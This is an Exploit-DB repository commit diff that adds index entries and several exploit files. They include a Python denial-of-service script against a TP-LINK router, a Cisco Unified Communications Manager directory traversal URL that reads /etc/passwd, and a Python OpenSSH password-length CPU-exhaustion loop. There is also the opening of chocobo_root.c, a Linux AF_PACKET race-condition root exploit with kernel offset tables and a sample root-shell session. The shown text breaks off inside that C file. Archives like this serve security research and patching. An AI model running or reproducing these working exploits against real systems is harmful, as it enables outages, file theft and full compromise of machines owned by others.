DB: 2016-12-09

5 new exploits

Dual DHCP DNS Server 7.29 - Denial of Service
TP-LINK TD-W8951ND - Denial of Service
OpenSSH 7.2 - Denial of Service

Linux Kernel 4.4.0 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Privilege Escalation

Advanced Webhost Billing System (AWBS) - cart2.php Remote File Inclusion
Advanced Webhost Billing System (AWBS) 2.4.0 - 'cart2.php' Remote File Inclusion
AWBS 2.7.1 - (news.php viewnews) SQL Injection
Anata CMS 1.0b5 - (change.php) Arbitrary Add Admin
Advanced Webhost Billing System (AWBS) 2.7.1 - 'news.php' SQL Injection
Anata CMS 1.0b5 - 'change.php' Arbitrary Add Admin

Simple Machines Forum 1.0.13 / 1.1.5 - 'Destroyer 0.1' Password Reset Security Bypass
Simple Machines Forum (SMF) 1.0.13 / 1.1.5 - 'Destroyer 0.1' Password Reset Security Bypass

Simple Machines Forum (SMF) - Multiple Security Vulnerabilities
Simple Machines Forum (SMF) 1.1.10/2.0 RC2 - Multiple Security Vulnerabilities

Advanced Webhost Billing System 2.2.2 - contact.php Multiple Cross-Site Scripting Vulnerabilities

Advanced Webhost Billing System 2.9.2 - 'oid' Parameter SQL Injection
Advanced Webhost Billing System (AWBS) 2.9.2 - 'oid' Parameter SQL Injection

Simple Machines Forum (SMF) 2.0.2 - 'index.php' scheduled Parameter Cross-Site Scripting
Simple Machines Forum (SMF) 2.0.2 - 'scheduled' Parameter Cross-Site Scripting

Cisco Unified Communications Manager 7/8/9 - Directory Traversal

files.csv

@@ -5294,6 +5294,9 @@ id,file,description,date,author,platform,type,port
 40879,platforms/windows/dos/40879.html,"Microsoft Internet Explorer 9 - CDoc::Execute­Script­Uri Use-After-Free (MS13-009)",2016-12-06,Skylined,windows,dos,0
 40880,platforms/windows/dos/40880.txt,"Microsoft Edge - CBase­Scriptable::Private­Query­Interface Memory Corruption (MS16-068)",2016-12-06,Skylined,windows,dos,0
 40883,platforms/windows/dos/40883.py,"Windows 10 x86/x64 WLAN AutoConfig - Denial of Service (POC)",2016-12-06,"Jeremy Brown",windows,dos,0
+40885,platforms/windows/dos/40885.py,"Dual DHCP DNS Server 7.29 - Denial of Service",2016-12-07,R-73eN,windows,dos,0
+40886,platforms/hardware/dos/40886.py,"TP-LINK TD-W8951ND - Denial of Service",2016-12-07,"Persian Hack Team",hardware,dos,0
+40888,platforms/linux/dos/40888.py,"OpenSSH 7.2 - Denial of Service",2016-12-07,"SecPod Research",linux,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@@ -8683,6 +8686,7 @@ id,file,description,date,author,platform,type,port
 40863,platforms/windows/local/40863.txt,"Microsoft Event Viewer 1.0 - XML External Entity Injection",2016-12-05,hyp3rlinx,windows,local,0
 40864,platforms/windows/local/40864.txt,"Microsoft MSINFO32.EXE 6.1.7601 - '.NFO' XML External Entity Injection",2016-12-05,hyp3rlinx,windows,local,0
 40865,platforms/windows/local/40865.txt,"Apache CouchDB 2.0.0 - Local Privilege Escalation",2016-12-05,hyp3rlinx,windows,local,0
+40871,platforms/linux/local/40871.c,"Linux Kernel 4.4.0 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Privilege Escalation",2016-12-06,rebel,linux,local,0
 40873,platforms/windows/local/40873.txt,"Microsoft PowerShell - XML External Entity Injection",2016-12-06,hyp3rlinx,windows,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
@@ -17516,7 +17520,7 @@ id,file,description,date,author,platform,type,port
 3785,platforms/php/webapps/3785.txt,"Post REvolution 0.7.0 RC 2 - (dir) Remote File Inclusion",2007-04-23,InyeXion,php,webapps,0
 3786,platforms/php/webapps/3786.txt,"GPB Bulletin Board - Multiple Remote File Inclusion",2007-04-24,"ThE TiGeR",php,webapps,0
 3794,platforms/php/webapps/3794.txt,"USP FOSS Distribution 1.01 - (dnld) Remote File Disclosure",2007-04-24,GoLd_M,php,webapps,0
-3795,platforms/php/webapps/3795.txt,"Advanced Webhost Billing System (AWBS) - cart2.php Remote File Inclusion",2007-04-24,DamaR,php,webapps,0
+3795,platforms/php/webapps/3795.txt,"Advanced Webhost Billing System (AWBS) 2.4.0 - 'cart2.php' Remote File Inclusion",2007-04-24,DamaR,php,webapps,0
 3796,platforms/php/webapps/3796.htm,"wavewoo 0.1.1 - (loading.php path_include) Remote File Inclusion",2007-04-24,kezzap66345,php,webapps,0
 3799,platforms/php/webapps/3799.txt,"JulmaCMS 1.4 - (file.php) Remote File Disclosure",2007-04-25,GoLd_M,php,webapps,0
 3800,platforms/php/webapps/3800.txt,"Ext 1.0 - (feed-proxy.php feed) Remote File Disclosure",2007-04-25,"Alkomandoz Hacker",php,webapps,0
@@ -18914,8 +18918,8 @@ id,file,description,date,author,platform,type,port
 5820,platforms/php/webapps/5820.txt,"PHPEasyNews 1.13 RC2 - 'POST' Parameter SQL Injection",2008-06-14,t0pP8uZz,php,webapps,0
 5821,platforms/php/webapps/5821.txt,"Alstrasoft AskMe Pro 2.1 - Multiple SQL Injections",2008-06-14,t0pP8uZz,php,webapps,0
 5822,platforms/php/webapps/5822.txt,"Devalcms 1.4a - 'currentfile' Parameter Local File Inclusion",2008-06-15,"CWH Underground",php,webapps,0
-5823,platforms/php/webapps/5823.txt,"AWBS 2.7.1 - (news.php viewnews) SQL Injection",2008-06-15,Mr.SQL,php,webapps,0
-5824,platforms/php/webapps/5824.txt,"Anata CMS 1.0b5 - (change.php) Arbitrary Add Admin",2008-06-15,"CWH Underground",php,webapps,0
+5823,platforms/php/webapps/5823.txt,"Advanced Webhost Billing System (AWBS) 2.7.1 - 'news.php' SQL Injection",2008-06-15,Mr.SQL,php,webapps,0
+5824,platforms/php/webapps/5824.txt,"Anata CMS 1.0b5 - 'change.php' Arbitrary Add Admin",2008-06-15,"CWH Underground",php,webapps,0
 5826,platforms/php/webapps/5826.py,"Simple Machines Forum (SMF) 1.1.4 - SQL Injection",2008-06-15,The:Paradox,php,webapps,0
 5828,platforms/php/webapps/5828.txt,"Oxygen 2.0 - (repquote) SQL Injection",2008-06-15,anonymous,php,webapps,0
 5829,platforms/php/webapps/5829.txt,"SH-News 3.0 - Insecure Cookie Handling",2008-06-15,"Virangar Security",php,webapps,0
@@ -20385,7 +20389,7 @@ id,file,description,date,author,platform,type,port
 7732,platforms/php/webapps/7732.php,"Silentum Uploader 1.4.0 - Remote File Deletion",2009-01-11,"Danny Moules",php,webapps,0
 7733,platforms/php/webapps/7733.txt,"Photobase 1.2 - 'Language' Local File Inclusion",2009-01-11,Osirys,php,webapps,0
 7734,platforms/php/webapps/7734.txt,"Joomla! Component Portfol - (vcatid) SQL Injection",2009-01-12,H!tm@N,php,webapps,0
-7735,platforms/php/webapps/7735.pl,"Simple Machines Forum 1.0.13 / 1.1.5 - 'Destroyer 0.1' Password Reset Security Bypass",2009-01-12,Xianur0,php,webapps,0
+7735,platforms/php/webapps/7735.pl,"Simple Machines Forum (SMF) 1.0.13 / 1.1.5 - 'Destroyer 0.1' Password Reset Security Bypass",2009-01-12,Xianur0,php,webapps,0
 7736,platforms/asp/webapps/7736.htm,"Comersus Shopping Cart 6.0 - Remote User Pass Exploit",2009-01-12,ajann,asp,webapps,0
 7738,platforms/php/webapps/7738.txt,"WordPress Plugin WP-Forum 1.7.8 - SQL Injection",2009-01-12,seomafia,php,webapps,0
 7740,platforms/php/webapps/7740.txt,"PWP Wiki Processor 1-5-1 - Arbitrary File Upload",2009-01-12,ahmadbady,php,webapps,0
@@ -21706,7 +21710,7 @@ id,file,description,date,author,platform,type,port
 10263,platforms/linux/webapps/10263.txt,"Quate CMS 0.3.5 - Remote File Inclusion / Local File Inclusion",2009-12-01,cr4wl3r,linux,webapps,80
 10272,platforms/php/webapps/10272.txt,"Joomla! Component Joaktree 1.0 - SQL Injection",2009-12-01,"Don Tukulesto",php,webapps,0
 10273,platforms/php/webapps/10273.txt,"Joomla! Component MojoBlog 0.15 - Multiple Remote File Inclusion",2009-12-01,kaMtiEz,php,webapps,0
-10274,platforms/php/webapps/10274.txt,"Simple Machines Forum (SMF) - Multiple Security Vulnerabilities",2009-12-02,"SimpleAudit Team",php,webapps,0
+10274,platforms/php/webapps/10274.txt,"Simple Machines Forum (SMF) 1.1.10/2.0 RC2 - Multiple Security Vulnerabilities",2009-12-02,"SimpleAudit Team",php,webapps,0
 10275,platforms/php/webapps/10275.txt,"Kide Shoutbox 0.4.6 - Cross-Site Scripting / AXFR",2009-12-02,andresg888,php,webapps,0
 10276,platforms/hardware/webapps/10276.txt,"Huawei MT882 Modem/Router - Multiple Vulnerabilities",2009-12-03,DecodeX01,hardware,webapps,0
 10277,platforms/php/webapps/10277.txt,"Thatware 0.5.3 - Multiple Remote File Inclusion",2009-12-03,cr4wl3r,php,webapps,0
@@ -29574,7 +29578,6 @@ id,file,description,date,author,platform,type,port
 28295,platforms/php/webapps/28295.txt,"Joomla! Plugin JD-WordPress 2.0-1.0 RC2 - wp-comments-post.php Remote File Inclusion",2006-07-28,Drago84,php,webapps,0
 28296,platforms/php/webapps/28296.txt,"Joomla! Plugin JD-WordPress 2.0-1.0 RC2 - wp-feed.php Remote File Inclusion",2006-07-28,Drago84,php,webapps,0
 28297,platforms/php/webapps/28297.txt,"Joomla! Plugin JD-WordPress 2.0-1.0 RC2 - wp-trackback.php Remote File Inclusion",2006-07-28,Drago84,php,webapps,0
-28300,platforms/php/webapps/28300.txt,"Advanced Webhost Billing System 2.2.2 - contact.php Multiple Cross-Site Scripting Vulnerabilities",2006-07-29,newbinaryfile,php,webapps,0
 28302,platforms/php/webapps/28302.txt,"Joomla! Component Liga Manager Online 2.0 - Remote File Inclusion",2006-07-30,vitux.manis,php,webapps,0
 28303,platforms/php/webapps/28303.txt,"X-Scripts X-Protection 1.10 - Protect.php SQL Injection",2006-07-29,SirDarckCat,php,webapps,0
 28304,platforms/php/webapps/28304.txt,"X-Scripts X-Poll 1.10 - top.php SQL Injection",2006-07-29,SirDarckCat,php,webapps,0
@@ -33917,7 +33920,7 @@ id,file,description,date,author,platform,type,port
 35224,platforms/php/webapps/35224.txt,"MyBB 1.8.x - Multiple Vulnerabilities",2014-11-13,smash,php,webapps,80
 35227,platforms/php/webapps/35227.txt,"Alguest 1.1c-patched - 'elimina' Parameter SQL Injection",2011-01-14,"Aliaksandr Hartsuyeu",php,webapps,0
 35228,platforms/php/webapps/35228.txt,"CompactCMS 1.4.1 - Multiple Cross-Site Scripting Vulnerabilities (2)",2011-01-15,NLSecurity,php,webapps,0
-35231,platforms/php/webapps/35231.txt,"Advanced Webhost Billing System 2.9.2 - 'oid' Parameter SQL Injection",2011-01-16,ShivX,php,webapps,0
+35231,platforms/php/webapps/35231.txt,"Advanced Webhost Billing System (AWBS) 2.9.2 - 'oid' Parameter SQL Injection",2011-01-16,ShivX,php,webapps,0
 35233,platforms/multiple/webapps/35233.txt,"B-Cumulus - 'tagcloud' Parameter Multiple Cross-Site Scripting Vulnerabilities",2011-01-18,MustLive,multiple,webapps,0
 35237,platforms/multiple/webapps/35237.txt,"Gogs (label pararm) - SQL Injection",2014-11-14,"Timo Schmid",multiple,webapps,80
 35238,platforms/multiple/webapps/35238.txt,"Gogs - (users and repos q pararm) SQL Injection",2014-11-14,"Timo Schmid",multiple,webapps,0
@@ -35059,7 +35062,7 @@ id,file,description,date,author,platform,type,port
 37024,platforms/php/webapps/37024.txt,"eZ Publish 4.x 'ezjscore' Module - Cross-Site Scripting",2012-03-29,"Yann MICHARD",php,webapps,0
 37025,platforms/php/webapps/37025.txt,"PHP Designer 2007 - Personal Multiple SQL Injection",2012-03-30,MR.XpR,php,webapps,0
 37026,platforms/php/webapps/37026.txt,"e107 1.0 - 'view' Parameter SQL Injection",2012-03-30,Am!r,php,webapps,0
-37027,platforms/php/webapps/37027.txt,"Simple Machines Forum (SMF) 2.0.2 - 'index.php' scheduled Parameter Cross-Site Scripting",2012-03-29,Am!r,php,webapps,0
+37027,platforms/php/webapps/37027.txt,"Simple Machines Forum (SMF) 2.0.2 - 'scheduled' Parameter Cross-Site Scripting",2012-03-29,Am!r,php,webapps,0
 37028,platforms/php/webapps/37028.txt,"JamWiki 1.1.5 - 'num' Parameter Cross-Site Scripting",2012-03-30,"Sooraj K.S",php,webapps,0
 37029,platforms/java/webapps/37029.txt,"ManageEngine Firewall Analyzer 7.2 - fw/index2.do Multiple Parameter Cross-Site Scripting",2012-04-01,"Vulnerability Research Laboratory",java,webapps,0
 37030,platforms/java/webapps/37030.txt,"ManageEngine Firewall Analyzer 7.2 - fw/createAnomaly.do subTab Parameter Cross-Site Scripting",2012-04-01,"Vulnerability Research Laboratory",java,webapps,0
@@ -36858,3 +36861,4 @@ id,file,description,date,author,platform,type,port
 40853,platforms/hardware/webapps/40853.txt,"Xfinity Gateway - Cross-Site Request Forgery",2016-11-30,Pabstersac,hardware,webapps,0
 40856,platforms/hardware/webapps/40856.txt,"Xfinity Gateway - Remote Code Execution",2016-12-02,"Gregory Smiley",hardware,webapps,0
 40877,platforms/php/webapps/40877.txt,"AbanteCart 1.2.7 - Cross-Site Scripting",2016-12-06,"Kacper Szurek",php,webapps,0
+40887,platforms/hardware/webapps/40887.txt,"Cisco Unified Communications Manager 7/8/9 - Directory Traversal",2016-12-07,justpentest,hardware,webapps,0

platforms/hardware/dos/40886.py

@@ -0,0 +1,24 @@
+# Exploit Title: TP-LINK TD-W8951ND - Denial of Service
+# Date: 2016-12-07
+# Exploit Author: Persian Hack Team
+# Discovered by : Mojtaba MobhaM 
+# Tested on: Windows AND Linux
+# Demo Construction : https://youtu.be/7mv_rW3mtVE
+
+#!/usr/bin/python
+import urllib
+
+site=raw_input("Enter IP Address : ")
+if (site.find('http://')<0):
+    strh = "http://"
+    url=strh+site
+else:
+    url=site
+
+try:
+    url += "/Forms/status_1?flagFresh=0&1 and benchmark(20000000%2csha1(1))--=1"
+    r = urllib.urlopen(url)
+    print r.code
+    print "Done!!"
+except:
+    pass

platforms/hardware/webapps/40887.txt

@@ -0,0 +1,27 @@
+# Exploit Title: Cisco Unified Communications Manager Administrative Web Interface Directory traversal CVE-2013-5528
+# Date: 7th December 2016
+# Exploit Author: justpentest
+# Vendor Homepage: https://software.cisco.com/
+# Software Link: https://software.cisco.com/download/navigator.html?mdfid=268439621
+# Version: Cisco Unified Communications Manager Administrative Web Interface unpatched version of 7.x, 8.x or 9.x software
+# Contact: transform2secure@gmail.com
+# CVE : CVE-2013-5528
+
+
+1) Description: 
+Directory traversal vulnerability exists in Cisco Unified Communications Manager Administrative Web Interface CVE-2013-5528.
+The vulnerability is due to a failure to properly sanitize user-supplied input passed to a specific function. 
+An attacker could exploit this vulnerability by supplying a series of directory traversal characters after authentication, allowing the attacker to designate a file outside the restricted directory to be returned. 
+An exploit could allow the attacker to obtain the contents of any file that is readable by the Apache Tomcat service account.
+
+2) Exploit:
+http://justpentest.com/ccmadmin/bulkvivewfilecontents.do?filetype=samplefile&fileName=../../../../../../../../../../../../../../../../etc/passwd
+
+3) Fixed version:
+Cisco has fixed the vulnerability in 9.1.2, 10.5.2 and 11.5.x.
+
+For more details visit http://justpentest.blogspot.in/2016/12/lfi-and-xss-on-cisco-unified-CM-CVE-2013-5528.html
+
+4) References:
+ https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/Cisco-SA-20131011-CVE-2013-5528 
+https://bst.cloudapps.cisco.com/bugsearch/bug/CSCui78815  

platforms/linux/dos/40888.py

@@ -0,0 +1,78 @@
+################################################################################
+# Title		: OpenSSH before 7.3 Crypt CPU Consumption (DoS Vulnerability)
+# Author	: Kashinath T (tkashinath@secpod.com) (www.secpod.com)
+# Vendor	: http://www.openssh.com/
+# Software	: http://www.openssh.com/
+# Version	: OpenSSH before 7.3
+# Tested on	: Ubuntu 16.04 LTS, Centos 7
+# CVE 		: CVE-2016-6515
+# Date		: 20-10-2016
+#
+# NOTE:
+# If the remote machine is installed and running OpenSSH version prior to 7.3,
+# it does not limit the password length for authentication. Hence, to exploit
+# this vulnerability' we will send a crafted data which is of 90000 characters
+# in length to the 'password' field while attempting to log in to a remote
+# machine via ssh with username as 'root'.
+#
+# For more info refer,
+# http://www.secpod.com/blog/openssh-crypt-cpu-consumption
+################################################################################
+
+import sys
+from random import choice
+from string import lowercase
+
+try:
+    import paramiko
+except ImportError:
+    print "[-] python module 'paramiko' is missing, Install paramiko with" \
+          " following command 'sudo pip install paramiko'"
+    sys.exit(0)
+
+
+class ssh_exploit:
+
+    def __init__(self):
+        """
+        Initialise the objects
+        """
+
+    def ssh_login(self, remote_ip):
+
+        try:
+            # Crafted password of length 90000
+            passwd_len = 90000
+            crafted_passwd = "".join(choice(lowercase)
+                                     for i in range(passwd_len))
+
+            # Connect to a remote machine via ssh
+            ssh = paramiko.SSHClient()
+            ssh.load_system_host_keys()
+            ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
+
+            # calling connect in infinite loop
+            print "[+] Entering infinite loop"
+            while 1:
+                ssh.connect(remote_ip, username='root',
+                            password=crafted_passwd)
+
+        except Exception, msg:
+            print "Error in connecting to remote host : ", remote_ip
+            print "Exception in : ssh_login method."
+            sys.exit(msg)
+
+
+def main():
+
+    if len(sys.argv) != 2:
+        print "usage: python openssh_crypt_cpu_consumption_dos.py 192.168.x.x"
+        sys.exit()
+
+    # Calling ssh_connect
+    ref_obj = ssh_exploit()
+    ref_obj.ssh_login(sys.argv[1])
+
+
+if __name__ == "__main__":
+    main()

platforms/linux/local/40871.c

@@ -0,0 +1,689 @@
+/*
+chocobo_root.c
+linux AF_PACKET race condition exploit
+exploit for Ubuntu 16.04 x86_64
+
+vroom vroom
+*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=
+user@ubuntu:~$ uname -a
+Linux ubuntu 4.4.0-51-generic #72-Ubuntu SMP Thu Nov 24 18:29:54 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
+user@ubuntu:~$ id
+uid=1000(user) gid=1000(user) groups=1000(user)
+user@ubuntu:~$ gcc chocobo_root.c -o chocobo_root -lpthread
+user@ubuntu:~$ ./chocobo_root
+linux AF_PACKET race condition exploit by rebel
+kernel version: 4.4.0-51-generic #72
+proc_dostring = 0xffffffff81088090
+modprobe_path = 0xffffffff81e48f80
+register_sysctl_table = 0xffffffff812879a0
+set_memory_rw = 0xffffffff8106f320
+exploit starting
+making vsyscall page writable..
+
+new exploit attempt starting, jumping to 0xffffffff8106f320, arg=0xffffffffff600000
+sockets allocated
+removing barrier and spraying..
+version switcher stopping, x = -1 (y = 174222, last val = 2)
+current packet version = 0
+pbd->hdr.bh1.offset_to_first_pkt = 48
+*=*=*=* TPACKET_V1 && offset_to_first_pkt != 0, race won *=*=*=*
+please wait up to a few minutes for timer to be executed. if you ctrl-c now the kernel will hang. so don't do that.
+closing socket and verifying.......
+vsyscall page altered!
+
+
+stage 1 completed
+registering new sysctl..
+
+new exploit attempt starting, jumping to 0xffffffff812879a0, arg=0xffffffffff600850
+sockets allocated
+removing barrier and spraying..
+version switcher stopping, x = -1 (y = 30773, last val = 0)
+current packet version = 2
+pbd->hdr.bh1.offset_to_first_pkt = 48
+race not won
+
+retrying stage..
+new exploit attempt starting, jumping to 0xffffffff812879a0, arg=0xffffffffff600850
+sockets allocated
+removing barrier and spraying..
+version switcher stopping, x = -1 (y = 133577, last val = 2)
+current packet version = 0
+pbd->hdr.bh1.offset_to_first_pkt = 48
+*=*=*=* TPACKET_V1 && offset_to_first_pkt != 0, race won *=*=*=*
+please wait up to a few minutes for timer to be executed. if you ctrl-c now the kernel will hang. so don't do that.
+closing socket and verifying.......
+sysctl added!
+
+stage 2 completed
+binary executed by kernel, launching rootshell
+root@ubuntu:~# id
+uid=0(root) gid=0(root) groups=0(root),1000(user)
+
+*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=
+
+There are offsets included for older kernels, but they're untested
+so be aware that this exploit will probably crash kernels older than 4.4.
+
+tested on:
+Ubuntu 16.04: 4.4.0-51-generic
+Ubuntu 16.04: 4.4.0-47-generic
+Ubuntu 16.04: 4.4.0-36-generic
+Ubuntu 14.04: 4.4.0-47-generic #68~14.04.1-Ubuntu
+
+Shoutouts to:
+jsc for inspiration (https://www.youtube.com/watch?v=x4UDIfcYMKI)
+mcdelivery for delivering hotcakes and coffee
+
+11/2016
+by rebel
+*/
+
+#define _GNU_SOURCE
+#include <stdlib.h>
+#include <stdio.h>
+#include <string.h>
+#include <stdint.h>
+#include <unistd.h>
+#include <sys/wait.h>
+#include <assert.h>
+#include <errno.h>
+#include <fcntl.h>
+#include <poll.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <arpa/inet.h>
+#include <netinet/if_ether.h>
+#include <sys/mman.h>
+#include <sys/socket.h>
+#include <sys/stat.h>
+#include <linux/if_packet.h>
+#include <pthread.h>
+#include <linux/sched.h>
+#include <netinet/tcp.h>
+#include <sys/syscall.h>
+#include <signal.h>
+#include <sched.h>
+#include <sys/utsname.h>
+
+volatile int barrier = 1;
+volatile int vers_switcher_done = 0;
+
+struct offset {
+    char *kernel_version;
+    unsigned long proc_dostring;
+    unsigned long modprobe_path;
+    unsigned long register_sysctl_table;
+    unsigned long set_memory_rw;
+};
+
+
+struct offset *off = NULL;
+
+//99% of these offsets haven't actually been tested :)
+
+struct offset offsets[] = {
+    {"4.4.0-46-generic #67~14.04.1",0xffffffff810842f0,0xffffffff81e4b100,0xffffffff81274580,0xffffffff8106b880},
+    {"4.4.0-47-generic #68~14.04.1",0,0,0,0},
+    {"4.2.0-41-generic #48",0xffffffff81083470,0xffffffff81e48920,0xffffffff812775c0,0xffffffff8106c680},
+    {"4.8.0-22-generic #24",0xffffffff8108ab70,0xffffffff81e47880,0xffffffff812b34b0,0xffffffff8106f0d0},
+    {"4.2.0-34-generic #39",0xffffffff81082080,0xffffffff81c487e0,0xffffffff81274490,0xffffffff8106b5d0},
+    {"4.2.0-30-generic #36",0xffffffff810820d0,0xffffffff81c487e0,0xffffffff812744e0,0xffffffff8106b620},
+    {"4.2.0-16-generic #19",0xffffffff81081ac0,0xffffffff81c48680,0xffffffff812738f0,0xffffffff8106b110},
+    {"4.2.0-17-generic #21",0,0,0,0},
+    {"4.2.0-18-generic #22",0,0,0,0},
+    {"4.2.0-19-generic #23~14.04.1",0xffffffff8107d640,0xffffffff81c497c0,0xffffffff8125de30,0xffffffff81067750},
+    {"4.2.0-21-generic #25~14.04.1",0,0,0,0},
+    {"4.2.0-30-generic #36~14.04.1",0xffffffff8107da40,0xffffffff81c4a8e0,0xffffffff8125dd40,0xffffffff81067b20},
+    {"4.2.0-27-generic #32~14.04.1",0xffffffff8107dbe0,0xffffffff81c498c0,0xffffffff8125e420,0xffffffff81067c60},
+    {"4.2.0-36-generic #42",0xffffffff81083430,0xffffffff81e488e0,0xffffffff81277380,0xffffffff8106c680},
+    {"4.4.0-22-generic #40",0xffffffff81087d40,0xffffffff81e48f00,0xffffffff812864d0,0xffffffff8106f370},
+    {"4.2.0-18-generic #22~14.04.1",0xffffffff8107d620,0xffffffff81c49780,0xffffffff8125dd10,0xffffffff81067760},
+    {"4.4.0-34-generic #53",0xffffffff81087ea0,0xffffffff81e48f80,0xffffffff81286ed0,0xffffffff8106f370},
+    {"4.2.0-22-generic #27",0xffffffff81081ad0,0xffffffff81c486c0,0xffffffff81273b20,0xffffffff8106b100},
+    {"4.2.0-23-generic #28",0,0,0,0},
+    {"4.2.0-25-generic #30",0,0,0,0},
+    {"4.4.0-36-generic #55",0xffffffff81087ea0,0xffffffff81e48f80,0xffffffff81286e50,0xffffffff8106f360},
+    {"4.2.0-42-generic #49",0xffffffff81083490,0xffffffff81e489a0,0xffffffff81277870,0xffffffff8106c680},
+    {"4.4.0-31-generic #50",0xffffffff81087ea0,0xffffffff81e48f80,0xffffffff81286e90,0xffffffff8106f370},
+    {"4.4.0-22-generic #40~14.04.1",0xffffffff81084250,0xffffffff81c4b080,0xffffffff81273de0,0xffffffff8106b9d0},
+    {"4.2.0-38-generic #45",0xffffffff810833d0,0xffffffff81e488e0,0xffffffff81277410,0xffffffff8106c680},
+    {"4.4.0-45-generic #66",0xffffffff81087fc0,0xffffffff81e48f80,0xffffffff812874c0,0xffffffff8106f320},
+    {"4.2.0-36-generic #42~14.04.1",0xffffffff8107ffd0,0xffffffff81c499e0,0xffffffff81261ea0,0xffffffff81069d00},
+    {"4.4.0-45-generic #66~14.04.1",0xffffffff81084260,0xffffffff81e4b100,0xffffffff81274340,0xffffffff8106b880},
+    {"4.2.0-22-generic #27~14.04.1",0xffffffff8107d640,0xffffffff81c497c0,0xffffffff8125deb0,0xffffffff81067750},
+    {"4.2.0-25-generic #30~14.04.1",0,0,0,0},
+    {"4.2.0-23-generic #28~14.04.1",0,0,0,0},
+    {"4.4.0-46-generic #67",0xffffffff81088040,0xffffffff81e48f80,0xffffffff81287800,0xffffffff8106f320},
+    {"4.4.0-47-generic #68",0,0,0,0},
+    {"4.4.0-34-generic #53~14.04.1",0xffffffff81084160,0xffffffff81c4b100,0xffffffff81273c40,0xffffffff8106b880},
+    {"4.4.0-36-generic #55~14.04.1",0xffffffff81084160,0xffffffff81c4b100,0xffffffff81273c60,0xffffffff8106b890},
+    {"4.4.0-31-generic #50~14.04.1",0xffffffff81084160,0xffffffff81c4b100,0xffffffff81273c20,0xffffffff8106b880},
+    {"4.2.0-38-generic #45~14.04.1",0xffffffff8107fdc0,0xffffffff81c4a9e0,0xffffffff81261540,0xffffffff81069bf0},
+    {"4.2.0-35-generic #40",0xffffffff81083430,0xffffffff81e48860,0xffffffff81277240,0xffffffff8106c680},
+    {"4.4.0-24-generic #43~14.04.1",0xffffffff81084120,0xffffffff81c4b080,0xffffffff812736f0,0xffffffff8106b880},
+    {"4.4.0-21-generic #37",0xffffffff81087cf0,0xffffffff81e48e80,0xffffffff81286310,0xffffffff8106f370},
+    {"4.2.0-34-generic #39~14.04.1",0xffffffff8107dc50,0xffffffff81c498e0,0xffffffff8125e830,0xffffffff81067c90},
+    {"4.4.0-24-generic #43",0xffffffff81087e60,0xffffffff81e48f00,0xffffffff812868f0,0xffffffff8106f370},
+    {"4.4.0-21-generic #37~14.04.1",0xffffffff81084220,0xffffffff81c4b000,0xffffffff81273a30,0xffffffff8106b9d0},
+    {"4.2.0-41-generic #48~14.04.1",0xffffffff8107fe20,0xffffffff81c4aa20,0xffffffff812616c0,0xffffffff81069bf0},
+    {"4.8.0-27-generic #29",0xffffffff8108ab70,0xffffffff81e47880,0xffffffff812b3490,0xffffffff8106f0d0},
+    {"4.8.0-26-generic #28",0,0,0,0},
+    {"4.4.0-38-generic #57",0xffffffff81087f70,0xffffffff81e48f80,0xffffffff81287470,0xffffffff8106f360},
+    {"4.4.0-42-generic #62~14.04.1",0xffffffff81084260,0xffffffff81e4b100,0xffffffff81274300,0xffffffff8106b880},
+    {"4.4.0-38-generic #57~14.04.1",0xffffffff81084210,0xffffffff81e4b100,0xffffffff812742e0,0xffffffff8106b890},
+    {"4.4.0-49-generic #70",0xffffffff81088090,0xffffffff81e48f80,0xffffffff81287d40,0xffffffff8106f320},
+    {"4.4.0-49-generic #70~14.04.1",0xffffffff81084350,0xffffffff81e4b100,0xffffffff81274b10,0xffffffff8106b880},
+    {"4.2.0-21-generic #25",0xffffffff81081ad0,0xffffffff81c486c0,0xffffffff81273aa0,0xffffffff8106b100},
+    {"4.2.0-19-generic #23",0,0,0,0},
+    {"4.2.0-42-generic #49~14.04.1",0xffffffff8107fe20,0xffffffff81c4aaa0,0xffffffff81261980,0xffffffff81069bf0},
+    {"4.4.0-43-generic #63",0xffffffff81087fc0,0xffffffff81e48f80,0xffffffff812874b0,0xffffffff8106f320},
+    {"4.4.0-28-generic #47",0xffffffff81087ea0,0xffffffff81e48f80,0xffffffff81286df0,0xffffffff8106f370},
+    {"4.4.0-28-generic #47~14.04.1",0xffffffff81084160,0xffffffff81c4b100,0xffffffff81273b70,0xffffffff8106b880},
+    {"4.9.0-1-generic #2",0xffffffff8108bbe0,0xffffffff81e4ac20,0xffffffff812b8400,0xffffffff8106f390},
+    {"4.8.0-28-generic #30",0xffffffff8108ae10,0xffffffff81e48b80,0xffffffff812b3690,0xffffffff8106f0e0},
+    {"4.2.0-35-generic #40~14.04.1",0xffffffff8107fff0,0xffffffff81c49960,0xffffffff81262320,0xffffffff81069d20},
+    {"4.2.0-27-generic #32",0xffffffff810820c0,0xffffffff81c487c0,0xffffffff81274150,0xffffffff8106b620},
+    {"4.4.0-42-generic #62",0xffffffff81087fc0,0xffffffff81e48f80,0xffffffff812874a0,0xffffffff8106f320},
+    {"4.4.0-51-generic #72",0xffffffff81088090,0xffffffff81e48f80,0xffffffff812879a0,0xffffffff8106f320},
+//{"4.8.6-300.fc25.x86_64 #1 SMP Tue Nov 1 12:36:38 UTC 2016",0xffffffff9f0a8b30,0xffffffff9fe40940,0xffffffff9f2cfbf0,0xffffffff9f0663b0},
+    {NULL,0,0,0,0}
+};
+
+#define VSYSCALL 0xffffffffff600000
+
